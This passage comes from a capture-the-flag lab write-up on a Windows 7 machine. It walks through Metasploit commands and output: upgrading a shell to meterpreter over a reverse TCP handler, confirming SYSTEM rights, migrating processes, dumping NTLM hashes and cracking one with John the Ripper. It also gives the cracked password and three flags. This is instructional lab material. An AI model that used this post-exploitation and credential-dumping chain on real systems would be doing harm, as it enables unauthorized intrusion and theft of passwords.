- Run! If this doesn’t work, try completing the exploit from the previous task once more.
1
2
3
4
5
6
| msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.33.96:4433
[*] Post module execution completed
|
That did not work.
I will try it with the last one…
1
2
| msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 264
SESSION => 264
|
1
2
3
4
5
6
7
8
9
10
| msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 264
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.8.33.96:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (200262 bytes) to 10.10.14.17
[*] Meterpreter session 265 opened (10.8.33.96:4433 -> 10.10.14.17:49701 ) at 2022-04-09 02:50:03 +0200
[*] Stopping exploit/multi/handler
|
Ok so this looks way better!
- Once the meterpreter shell conversion completes, select that session for use.
After looking at the sessions with the command sessions
I saw a new session
1
2
| 265 meterpreter x64/windows NT AUTHORITY\SYSTEM @ JON-PC 10.8.33.96:4433 -> 10.10.14.17:49701 (1
0.10.14.17)
|
Let’s try to interact with it!
1
2
3
4
| msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 265
[*] Starting interaction with 265...
meterpreter >
|
We finally got a meterpreter shell!
And it is working:
1
2
3
4
5
6
7
8
| meterpreter > sysinfo
Computer : JON-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
|
We can see that the system is running Windows 7 x64
- Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
Using the getuid command I can see with which user we are currently interacting with
1
2
| meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
|
Looks like we got system rights. The user NT AUTHORITY\SYSTEM has even more
rights than an administrator under Windows.
- List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
| meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
460 668 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
484 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
568 560 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
616 560 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
628 608 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
668 608 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
716 616 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
724 616 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
732 616 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
788 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
844 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
912 716 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
960 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1124 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1216 716 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1244 716 TrustedInstaller.ex x64 0 NT AUTHORITY\SYSTEM
e
1324 716 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1368 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1388 568 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
1464 2564 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v
1.0\powershell.exe
1468 716 amazon-ssm-agent.ex x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-
e agent.exe
1524 716 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\XenTools\LiteAg
ent.exe
1680 716 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigServic
e\Ec2Config.exe
1964 844 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wbem\wmiprvse.exe
1980 716 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2132 844 WmiPrvSE.exe
2228 1324 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2600 716 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
2612 716 vds.exe x64 0 NT AUTHORITY\SYSTEM
2736 568 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
2856 716 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework\v4.0
.30319\mscorsvw.exe
2888 716 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Framework64\v4
.0.30319\mscorsvw.exe
2928 716 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2972 716 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2996 716 svchost.exe x64 0 NT AUTHORITY\SYSTEM
|
We could use this one here 2888 716 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM
This process if for the ms windows core services and it is running as SYSTEM
The process id is 2888
- Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.
1
2
3
| meterpreter > migrate 2888
[*] Migrating from 1464 to 2888...
[*] Migration completed successfully.
|
Looks like the migration worked fine.
Task 4: Cracking
Dump the non-default user’s password and crack it!
- Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
1
2
3
4
| meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
|
The name of the non-default user is Jon here.
- Copy this password hash to a file and research how to crack it. What is the cracked password?
Ok so let’s copy the hash to a file hash.txt
1
| echo "Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::" > hash.txt
|
the hash format should be NT
Let’s try to crack it using john the ripper and use the wordlist rockyou.txt since it contains
a lot of commonly used passwords!
1
2
3
4
5
6
7
8
9
| sudo john --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22 (Jon)
1g 0:00:00:00 DONE (2022-04-09 03:26) 1.923g/s 19616Kp/s 19616Kc/s 19616KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
|
We successfully cracked the password hash!
The passwords for the user Jon is alqfna22 !
Task 5: Find flags!
Find the three flags planted on this machine. These are not traditional flags, rather, they’re meant to represent key locations within the Windows system. Use the hints provided below to complete this room!
- Flag1? This flag can be found at the system root.
Let’s switch back to our terminal session 1
1
2
3
4
5
6
7
8
9
10
| msf6 post(multi/manage/shell_to_meterpreter) > sessions -i 1
[*] Starting interaction with 1...
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
|
and locate the flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| C:\Windows\system32>cd ..
cd ..
C:\Windows>cd ..
cd ..
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\
03/17/2019 02:27 PM 24 flag1.txt
07/13/2009 10:20 PM <DIR> PerfLogs
04/12/2011 03:28 AM <DIR> Program Files
03/17/2019 05:28 PM <DIR> Program Files (x86)
12/12/2018 10:13 PM <DIR> Users
03/17/2019 05:36 PM <DIR> Windows
1 File(s) 24 bytes
5 Dir(s) 20,617,707,520 bytes free
|
the flag is called flag1.txt
let’s get the contents of it:
1
2
3
| C:\>type flag1.txt
type flag1.txt
flag{access_the_machine}
|
We managed to get the first flag!
- Flag2? This flag can be found at the location where passwords are stored within Windows.
*Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen.
Passwords in windows are usually stored in the SAM database.
This database is located in C:\Windows\System32\config
1
| cd C:\Windows\System32\config
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| C:\Windows\System32\config>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Windows\System32\config
04/08/2022 08:11 PM <DIR> .
04/08/2022 08:11 PM <DIR> ..
12/12/2018 06:00 PM 28,672 BCD-Template
04/08/2022 08:19 PM 18,087,936 COMPONENTS
04/08/2022 08:20 PM 262,144 DEFAULT
03/17/2019 02:32 PM 34 flag2.txt
07/13/2009 09:34 PM <DIR> Journal
03/17/2019 02:56 PM <DIR> RegBack
03/17/2019 03:05 PM 262,144 SAM
04/08/2022 08:20 PM 262,144 SECURITY
04/08/2022 08:37 PM 40,632,320 SOFTWARE
04/08/2022 08:33 PM 12,582,912 SYSTEM
11/20/2010 09:41 PM <DIR> systemprofile
12/12/2018 06:03 PM <DIR> TxR
8 File(s) 72,118,306 bytes
6 Dir(s) 20,617,707,520 bytes free
|
There is the file we are looking for.
It is SAM.
And here is our second flag!
1
2
3
| C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{sam_database_elevated_access}
|
- flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
This is a hint to look at the home directory of the admin user.
Let’s see what he has hidden there …
There is no user Administrator in the directory C:\Users.
But instead there is a user folder for the user Jon.
Let’s see what he is hiding there …
1
| C:\Users>cd C:\Users\Jon
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| C:\Users\Jon>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon
12/12/2018 10:13 PM <DIR> .
12/12/2018 10:13 PM <DIR> ..
12/12/2018 10:13 PM <DIR> Contacts
12/12/2018 10:49 PM <DIR> Desktop
12/12/2018 10:49 PM <DIR> Documents
12/12/2018 10:13 PM <DIR> Downloads
12/12/2018 10:13 PM <DIR> Favorites
12/12/2018 10:13 PM <DIR> Links
12/12/2018 10:13 PM <DIR> Music
12/12/2018 10:13 PM <DIR> Pictures
12/12/2018 10:13 PM <DIR> Saved Games
12/12/2018 10:13 PM <DIR> Searches
12/12/2018 10:13 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 20,619,608,064 bytes free
|
Mh nothing?
Let’s take a look at his documents.
1
2
3
4
5
6
7
8
9
10
11
12
| C:\Users\Jon>dir Documents
dir Documents
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,619,608,064 bytes free
|
Gotcha! There is our third flag!
1
2
3
4
5
6
| C:\Users\Jon>cd Documents
cd Documents
C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{admin_documents_can_be_valuable}
|
We managed to get the third and last flag
and thus successfully completed this room!
Thanks for tuning in!
